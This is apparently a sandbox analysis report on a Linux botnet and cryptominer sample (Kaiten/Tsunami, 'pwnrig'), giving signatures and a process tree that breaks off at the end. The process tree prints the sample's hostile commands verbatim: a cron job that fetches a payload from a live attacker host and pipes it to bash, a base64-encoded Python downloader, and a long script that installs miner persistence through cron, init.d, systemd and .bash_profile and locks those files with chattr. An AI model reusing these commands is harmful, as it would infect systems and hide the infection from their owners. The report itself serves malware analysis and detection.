Analysis

  • max time kernel
    131s
  • max time network
    132s
  • platform
    ubuntu-20.04_amd64
  • resource
    ubuntu2004-amd64-20240221-en
  • resource tags

    arch:amd64arch:i386image:ubuntu2004-amd64-20240221-enkernel:5.4.0-169-genericlocale:en-usos:ubuntu-20.04-amd64system
  • submitted
    24-02-2024 19:04

General

  • Target

    bin.elf

  • Size

    3.8MB

  • MD5

    1184bf04877dec9a4bbb24acd30c8d49

  • SHA1

    e68649a61a173c93775580ec0e975a3a87250e9d

  • SHA256

    96a47e74c42f7cb2799ef064f413aeaeaf667662a3983b4e66556a827aa2481a

  • SHA512

    25917099b31a0bd7b3fab4600c318c3a3acab5bb1c2dc8d7fbccfc22046fb7a551747065ad9016dba26d8de16a0782d4a7279a5b644c7802f4151c4d3184d104

  • SSDEEP

    98304:e6M0JGEyxYXQKOscf3j3/DaNAq//XxsdQDYpexnaG4oDhAJ:i0JZ8yysw3zDuTXqQD+exawDhY

Malware Config

Signatures

  • Detects Kaiten/Tsunami Payload 1 IoCs
  • Detects Kaiten/Tsunami payload 1 IoCs
  • Kaiten/Tsunami

    Linux-based IoT botnet which is controlled through IRC and normally used to carry out DDoS attacks.

  • Executes dropped EXE 1 IoCs
  • Reads EFI boot settings 10 IoCs

    Reads EFI boot settings from the efivars filesystem, may contain security secrets or sensitive data.

  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Attempts to change immutable files 14 IoCs

    Modifies inode attributes on the filesystem to allow changing of immutable files.

  • Checks CPU configuration 1 TTPs 6 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Checks hardware identifiers (DMI) 1 TTPs 8 IoCs

    Checks DMI information which indicate if the system is a virtual machine.

  • Creates/modifies Cron job 1 TTPs 15 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Modifies init.d 1 TTPs 3 IoCs

    Adds/modifies system service, likely for persistence.

  • Modifies systemd 1 TTPs 3 IoCs

    Adds/ modifies systemd service files. Likely to achieve persistence.

  • Reads CPU attributes 1 TTPs 12 IoCs
  • Reads hardware information 1 TTPs 28 IoCs

    Accesses system info like serial numbers, manufacturer names etc.

  • Writes file to system bin folder 1 TTPs 5 IoCs
  • Enumerates kernel/hardware configuration 1 TTPs 64 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 8 IoCs

    Malware often drops required files in the /tmp directory.

  • GoLang User-Agent 15 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

Processes

  • /tmp/bin.elf
    /tmp/bin.elf
    1⤵
    • Modifies init.d
    • Modifies systemd
    • Writes file to system bin folder
    • Writes file to tmp directory
    PID:1475
    • /usr/bin/bash
      bash -c "rm -rf /etc/sysctl.conf ; echo fs.file-max = 2097152 > /etc/sysctl.conf ; sysctl -p ; ulimit -Hn ; ulimit -n 99999 -u 999999"
      2⤵
        PID:1495
        • /usr/bin/rm
          rm -rf /etc/sysctl.conf
          3⤵
            PID:1496
          • /usr/sbin/sysctl
            sysctl -p
            3⤵
              PID:1497
          • /usr/bin/chattr
            chattr +ia /etc/init.d/knlib
            2⤵
              PID:1498
            • /etc/init.d/knlib
              /etc/init.d/knlib start
              2⤵
              • Executes dropped EXE
              PID:1499
              • /usr/bin/cp
                cp -f -r -- /bin/knlib /bin/klibsystem4
                3⤵
                  PID:1500
                • /usr/bin/rm
                  rm -rf -- klibsystem4
                  3⤵
                    PID:1502
                  • /usr/bin/nohup
                    nohup ./klibsystem4
                    3⤵
                      PID:1501
                  • /usr/bin/chattr
                    chattr +ia /etc/systemd/system/knlibe.service
                    2⤵
                      PID:1503
                    • /usr/bin/systemctl
                      systemctl daemon-reload
                      2⤵
                      • Reads EFI boot settings
                      PID:1505
                    • /usr/bin/systemctl
                      systemctl enable knlibe.service
                      2⤵
                      • Reads EFI boot settings
                      • Enumerates kernel/hardware configuration
                      PID:1558
                    • /usr/bin/chattr
                      chattr +ia /bin/knlib
                      2⤵
                        PID:1594
                      • /usr/bin/bash
                        bash -c "echo '*/10 * * * * (curl -s http://dw.c4kdeliver.top:443/2.gif || wget -q -O - http://dw.c4kdeliver.top:443/2.gif || lwp-download http://dw.c4kdeliver.top:443/2.gif /tmp/2.gif) | bash -sh; bash /tmp/2.gif; rm -rf /tmp/2.gif; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDY6NDQzL2QucHkiKS5yZWFkKCkpJyB8fCBweXRob24yIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash' | crontab -"
                        2⤵
                          PID:2554
                          • /usr/bin/crontab
                            crontab -
                            3⤵
                            • Creates/modifies Cron job
                            PID:2556
                        • /usr/bin/ss
                          ss -ant
                          2⤵
                            PID:2557
                          • /usr/bin/ss
                            ss -ant
                            2⤵
                              PID:2558
                            • /usr/bin/ss
                              ss -ant
                              2⤵
                                PID:2559
                              • /usr/bin/bash
                                bash -c "echo '*/10 * * * * (curl -s http://dw.c4kdeliver.top:443/2.gif || wget -q -O - http://dw.c4kdeliver.top:443/2.gif || lwp-download http://dw.c4kdeliver.top:443/2.gif /tmp/2.gif) | bash -sh; bash /tmp/2.gif; rm -rf /tmp/2.gif; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDY6NDQzL2QucHkiKS5yZWFkKCkpJyB8fCBweXRob24yIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash' | crontab -"
                                2⤵
                                  PID:2567
                                  • /usr/bin/crontab
                                    crontab -
                                    3⤵
                                    • Creates/modifies Cron job
                                    PID:2569
                                • /usr/bin/ss
                                  ss -ant
                                  2⤵
                                    PID:2570
                                  • /usr/bin/ss
                                    ss -ant
                                    2⤵
                                      PID:2571
                                    • /usr/bin/ss
                                      ss -ant
                                      2⤵
                                        PID:2572
                                    • /usr/bin/klibsystem4
                                      ./klibsystem4
                                      1⤵
                                        PID:1501
                                      • /usr/bin/bash
                                        bash -c "echo '*/10 * * * * (curl -s http://185.172.128.146:443/2.gif || wget -q -O - http://dw.c4kdeliver.top:443/2.gif || lwp-download http://dw.c4kdeliver.top:443/2.gif /tmp/2.gif) | bash -sh; bash /tmp/2.gif; rm -rf /tmp/2.gif; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDY6NDQzL2QucHkiKS5yZWFkKCkpJyB8fCBweXRob24yIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash' | crontab -"
                                        1⤵
                                          PID:2007
                                          • /usr/bin/crontab
                                            crontab -
                                            2⤵
                                            • Creates/modifies Cron job
                                            PID:2009
                                        • /usr/bin/ss
                                          ss -ant
                                          1⤵
                                            PID:2010
                                          • /usr/bin/nohup
                                            nohup /tmp/bi.64 "&"
                                            1⤵
                                              PID:2013
                                            • /tmp/bi.64
                                              /tmp/bi.64 "&"
                                              1⤵
                                              • Writes file to tmp directory
                                              PID:2013
                                            • /usr/bin/ss
                                              ss -ant
                                              1⤵
                                                PID:2015
                                              • /usr/bin/nohup
                                                nohup /tmp/bin.64 -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d -pwn "&"
                                                1⤵
                                                  PID:2016
                                                • /tmp/bin.64
                                                  /tmp/bin.64 -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d -pwn "&"
                                                  1⤵
                                                  • Checks CPU configuration
                                                  • Checks hardware identifiers (DMI)
                                                  • Reads CPU attributes
                                                  • Reads hardware information
                                                  • Enumerates kernel/hardware configuration
                                                  PID:2016
                                                  • /bin/sh
                                                    sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
                                                    2⤵
                                                      PID:2017
                                                      • /usr/bin/whoami
                                                        whoami
                                                        3⤵
                                                          PID:2028
                                                        • /usr/bin/hostname
                                                          hostname
                                                          3⤵
                                                            PID:2029
                                                          • /usr/bin/grep
                                                            grep -c "^processor" /proc/cpuinfo
                                                            3⤵
                                                            • Checks CPU configuration
                                                            PID:2030
                                                        • /bin/sh
                                                          sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
                                                          2⤵
                                                            PID:2046
                                                            • /usr/bin/awk
                                                              awk "/[zZ]/ && !a[\$2]++ {print \$2}"
                                                              3⤵
                                                                PID:2048
                                                              • /usr/bin/ps
                                                                ps -A "-ostat,ppid"
                                                                3⤵
                                                                • Reads CPU attributes
                                                                • Reads runtime system information
                                                                PID:2047
                                                              • /usr/bin/id
                                                                id -u
                                                                3⤵
                                                                  PID:2050
                                                                • /usr/bin/grep
                                                                  grep -v grep
                                                                  3⤵
                                                                    PID:2053
                                                                  • /usr/bin/grep
                                                                    grep /etc/cron
                                                                    3⤵
                                                                      PID:2052
                                                                    • /usr/bin/ps
                                                                      ps x
                                                                      3⤵
                                                                      • Reads CPU attributes
                                                                      • Reads runtime system information
                                                                      PID:2051
                                                                  • /bin/sh
                                                                    sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/bin.64';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"
                                                                    2⤵
                                                                    • Writes file to tmp directory
                                                                    PID:2055
                                                                    • /usr/bin/id
                                                                      id -u
                                                                      3⤵
                                                                        PID:2056
                                                                      • /usr/bin/id
                                                                        id -u
                                                                        3⤵
                                                                          PID:2057
                                                                        • /usr/bin/chattr
                                                                          chattr -i -a /bin/bprofr "~/.bash_profile"
                                                                          3⤵
                                                                          • Attempts to change immutable files
                                                                          PID:2058
                                                                        • /usr/bin/rm
                                                                          rm -rf /bin/bprofr
                                                                          3⤵
                                                                            PID:2059
                                                                          • /usr/bin/sed
                                                                            sed -i /bprofr/d "~/.bash_profile"
                                                                            3⤵
                                                                            • Attempts to change immutable files
                                                                            PID:2060
                                                                          • /usr/bin/cp
                                                                            cp -f -r -- /tmp/bin.64 /bin/bprofr
                                                                            3⤵
                                                                            • Writes file to system bin folder
                                                                            PID:2061
                                                                          • /usr/bin/id
                                                                            id -u
                                                                            3⤵
                                                                              PID:2062
                                                                            • /usr/bin/chattr
                                                                              chattr +i +a /bin/bprofr "~/.bash_profile"
                                                                              3⤵
                                                                              • Attempts to change immutable files
                                                                              PID:2063
                                                                            • /usr/bin/mkdir
                                                                              mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly
                                                                              3⤵
                                                                              • Reads runtime system information
                                                                              PID:2064
                                                                            • /usr/bin/chattr
                                                                              chattr -i -a "/etc/cron.*/pwnrig" /bin/crondr
                                                                              3⤵
                                                                              • Attempts to change immutable files
                                                                              PID:2065
                                                                            • /usr/bin/rm
                                                                              rm -rf /bin/crondr
                                                                              3⤵
                                                                                PID:2066
                                                                              • /usr/bin/cp
                                                                                cp -f -r -- /tmp/bin.64 /bin/crondr
                                                                                3⤵
                                                                                • Writes file to system bin folder
                                                                                PID:2067
                                                                              • /usr/bin/tee
                                                                                tee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig
                                                                                3⤵
                                                                                • Creates/modifies Cron job
                                                                                PID:2069
                                                                              • /usr/bin/sed
                                                                                sed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig
                                                                                3⤵
                                                                                • Attempts to change immutable files
                                                                                • Creates/modifies Cron job
                                                                                PID:2070
                                                                              • /usr/bin/chmod
                                                                                chmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
                                                                                3⤵
                                                                                  PID:2071
                                                                                • /usr/bin/chattr
                                                                                  chattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
                                                                                  3⤵
                                                                                  • Attempts to change immutable files
                                                                                  PID:2072
                                                                                • /usr/bin/which
                                                                                  which chkconfig
                                                                                  3⤵
                                                                                    PID:2073
                                                                                  • /usr/bin/which
                                                                                    which update-rc.d
                                                                                    3⤵
                                                                                      PID:2074
                                                                                    • /usr/bin/chattr
                                                                                      chattr -i -a /etc/init.d/pwnrig /bin/initdr
                                                                                      3⤵
                                                                                      • Attempts to change immutable files
                                                                                      PID:2075
                                                                                    • /usr/sbin/update-rc.d
                                                                                      update-rc.d -f pwnrig disable
                                                                                      3⤵
                                                                                        PID:2076
                                                                                      • /usr/sbin/update-rc.d
                                                                                        update-rc.d -f pwnrig remove
                                                                                        3⤵
                                                                                          PID:2077
                                                                                          • /usr/local/sbin/systemctl
                                                                                            systemctl daemon-reload
                                                                                            4⤵
                                                                                              PID:2078
                                                                                            • /usr/local/bin/systemctl
                                                                                              systemctl daemon-reload
                                                                                              4⤵
                                                                                                PID:2078
                                                                                              • /usr/sbin/systemctl
                                                                                                systemctl daemon-reload
                                                                                                4⤵
                                                                                                  PID:2078
                                                                                                • /usr/bin/systemctl
                                                                                                  systemctl daemon-reload
                                                                                                  4⤵
                                                                                                  • Reads EFI boot settings
                                                                                                  • Reads runtime system information
                                                                                                  PID:2078
                                                                                              • /usr/bin/rm
                                                                                                rm -rf /bin/initdr
                                                                                                3⤵
                                                                                                  PID:2104
                                                                                                • /usr/bin/cp
                                                                                                  cp -f -r -- /tmp/bin.64 /bin/initdr
                                                                                                  3⤵
                                                                                                  • Writes file to system bin folder
                                                                                                  PID:2105
                                                                                                • /usr/bin/tee
                                                                                                  tee /etc/init.d/pwnrig
                                                                                                  3⤵
                                                                                                  • Modifies init.d
                                                                                                  PID:2107
                                                                                                • /usr/bin/sed
                                                                                                  sed -i "1 s/-e //" /etc/init.d/pwnrig
                                                                                                  3⤵
                                                                                                  • Attempts to change immutable files
                                                                                                  • Modifies init.d
                                                                                                  PID:2108
                                                                                                • /usr/bin/chmod
                                                                                                  chmod +x /etc/init.d/pwnrig /bin/initdr
                                                                                                  3⤵
                                                                                                    PID:2109
                                                                                                  • /usr/sbin/update-rc.d
                                                                                                    update-rc.d pwnrig defaults
                                                                                                    3⤵
                                                                                                      PID:2110
                                                                                                      • /usr/local/sbin/systemctl
                                                                                                        systemctl daemon-reload
                                                                                                        4⤵
                                                                                                          PID:2111
                                                                                                        • /usr/local/bin/systemctl
                                                                                                          systemctl daemon-reload
                                                                                                          4⤵
                                                                                                            PID:2111
                                                                                                          • /usr/sbin/systemctl
                                                                                                            systemctl daemon-reload
                                                                                                            4⤵
                                                                                                              PID:2111
                                                                                                            • /usr/bin/systemctl
                                                                                                              systemctl daemon-reload
                                                                                                              4⤵
                                                                                                              • Reads EFI boot settings
                                                                                                              PID:2111
                                                                                                          • /usr/sbin/update-rc.d
                                                                                                            update-rc.d pwnrig enable
                                                                                                            3⤵
                                                                                                              PID:2137
                                                                                                              • /usr/local/sbin/systemctl
                                                                                                                systemctl --quiet enable pwnrig
                                                                                                                4⤵
                                                                                                                  PID:2138
                                                                                                                • /usr/local/bin/systemctl
                                                                                                                  systemctl --quiet enable pwnrig
                                                                                                                  4⤵
                                                                                                                    PID:2138
                                                                                                                  • /usr/sbin/systemctl
                                                                                                                    systemctl --quiet enable pwnrig
                                                                                                                    4⤵
                                                                                                                      PID:2138
                                                                                                                    • /usr/bin/systemctl
                                                                                                                      systemctl --quiet enable pwnrig
                                                                                                                      4⤵
                                                                                                                      • Reads EFI boot settings
                                                                                                                      PID:2138
                                                                                                                    • /usr/local/sbin/systemctl
                                                                                                                      systemctl daemon-reload
                                                                                                                      4⤵
                                                                                                                        PID:2139
                                                                                                                      • /usr/local/bin/systemctl
                                                                                                                        systemctl daemon-reload
                                                                                                                        4⤵
                                                                                                                          PID:2139
                                                                                                                        • /usr/sbin/systemctl
                                                                                                                          systemctl daemon-reload
                                                                                                                          4⤵
                                                                                                                            PID:2139
                                                                                                                          • /usr/bin/systemctl
                                                                                                                            systemctl daemon-reload
                                                                                                                            4⤵
                                                                                                                            • Reads EFI boot settings
                                                                                                                            PID:2139
                                                                                                                        • /usr/bin/chattr
                                                                                                                          chattr +i +a /etc/init.d/pwnrig /bin/initdr
                                                                                                                          3⤵
                                                                                                                          • Attempts to change immutable files
                                                                                                                          PID:2165
                                                                                                                        • /usr/bin/which
                                                                                                                          which systemctl
                                                                                                                          3⤵
                                                                                                                            PID:2166
                                                                                                                          • /usr/bin/chattr
                                                                                                                            chattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr
                                                                                                                            3⤵
                                                                                                                            • Attempts to change immutable files
                                                                                                                            PID:2167
                                                                                                                          • /usr/bin/rm
                                                                                                                            rm -rf /bin/sysdr
                                                                                                                            3⤵
                                                                                                                              PID:2168
                                                                                                                            • /usr/bin/cp
                                                                                                                              cp -f -r -- /tmp/bin.64 /bin/sysdr
                                                                                                                              3⤵
                                                                                                                              • Writes file to system bin folder
                                                                                                                              PID:2169
                                                                                                                            • /usr/bin/tee
                                                                                                                              tee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service
                                                                                                                              3⤵
                                                                                                                              • Modifies systemd
                                                                                                                              PID:2171
                                                                                                                            • /usr/bin/sed
                                                                                                                              sed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service
                                                                                                                              3⤵
                                                                                                                              • Attempts to change immutable files
                                                                                                                              PID:2172
                                                                                                                            • /usr/bin/chattr
                                                                                                                              chattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr
                                                                                                                              3⤵
                                                                                                                              • Attempts to change immutable files
                                                                                                                              PID:2173
                                                                                                                            • /usr/bin/systemctl
                                                                                                                              systemctl enable pwnrige.service
                                                                                                                              3⤵
                                                                                                                              • Reads EFI boot settings
                                                                                                                              PID:2174
                                                                                                                            • /usr/bin/systemctl
                                                                                                                              systemctl enable pwnrigl.service
                                                                                                                              3⤵
                                                                                                                              • Reads EFI boot settings
                                                                                                                              PID:2200
                                                                                                                            • /usr/bin/systemctl
                                                                                                                              systemctl daemon-reload
                                                                                                                              3⤵
                                                                                                                              • Reads EFI boot settings
                                                                                                                              • Enumerates kernel/hardware configuration
                                                                                                                              PID:2226
                                                                                                                            • /usr/bin/systemctl
                                                                                                                              systemctl reload-or-restart pwnrige.service
                                                                                                                              3⤵
                                                                                                                              • Reads EFI boot settings
                                                                                                                              PID:2252
                                                                                                                        • /usr/bin/hostname
                                                                                                                          hostname -I
                                                                                                                          1⤵
                                                                                                                            PID:2020
                                                                                                                          • /usr/bin/awk
                                                                                                                            awk "{print \$1}"
                                                                                                                            1⤵
                                                                                                                              PID:2022
                                                                                                                            • /usr/bin/awk
                                                                                                                              awk "{print \"-\"\$2}"
                                                                                                                              1⤵
                                                                                                                                PID:2027
                                                                                                                              • /usr/bin/head
                                                                                                                                head -n 1
                                                                                                                                1⤵
                                                                                                                                  PID:2026
                                                                                                                                • /usr/bin/grep
                                                                                                                                  grep "Port "
                                                                                                                                  1⤵
                                                                                                                                    PID:2025
                                                                                                                                  • /usr/bin/cat
                                                                                                                                    cat /etc/ssh/sshd_config
                                                                                                                                    1⤵
                                                                                                                                      PID:2024
                                                                                                                                    • /usr/bin/sed
                                                                                                                                      sed -e "s/\$//"
                                                                                                                                      1⤵
                                                                                                                                        PID:2036
                                                                                                                                      • /usr/bin/sed
                                                                                                                                        sed -e "s/^ *//"
                                                                                                                                        1⤵
                                                                                                                                          PID:2035
                                                                                                                                        • /usr/bin/cut
                                                                                                                                          cut -d: -f2
                                                                                                                                          1⤵
                                                                                                                                            PID:2034
                                                                                                                                          • /usr/bin/grep
                                                                                                                                            grep -m 1 "model name" /proc/cpuinfo
                                                                                                                                            1⤵
                                                                                                                                            • Checks CPU configuration
                                                                                                                                            PID:2033
                                                                                                                                          • /usr/bin/awk
                                                                                                                                            awk "{print \$1}"
                                                                                                                                            1⤵
                                                                                                                                              PID:2039
                                                                                                                                            • /usr/bin/awk
                                                                                                                                              awk "{print \$4}"
                                                                                                                                              1⤵
                                                                                                                                                PID:2042
                                                                                                                                              • /usr/bin/awk
                                                                                                                                                awk "{print \$4}"
                                                                                                                                                1⤵
                                                                                                                                                  PID:2045
                                                                                                                                                • /usr/bin/ss
                                                                                                                                                  ss -ant
                                                                                                                                                  1⤵
                                                                                                                                                    PID:2309
                                                                                                                                                  • /usr/bin/nohup
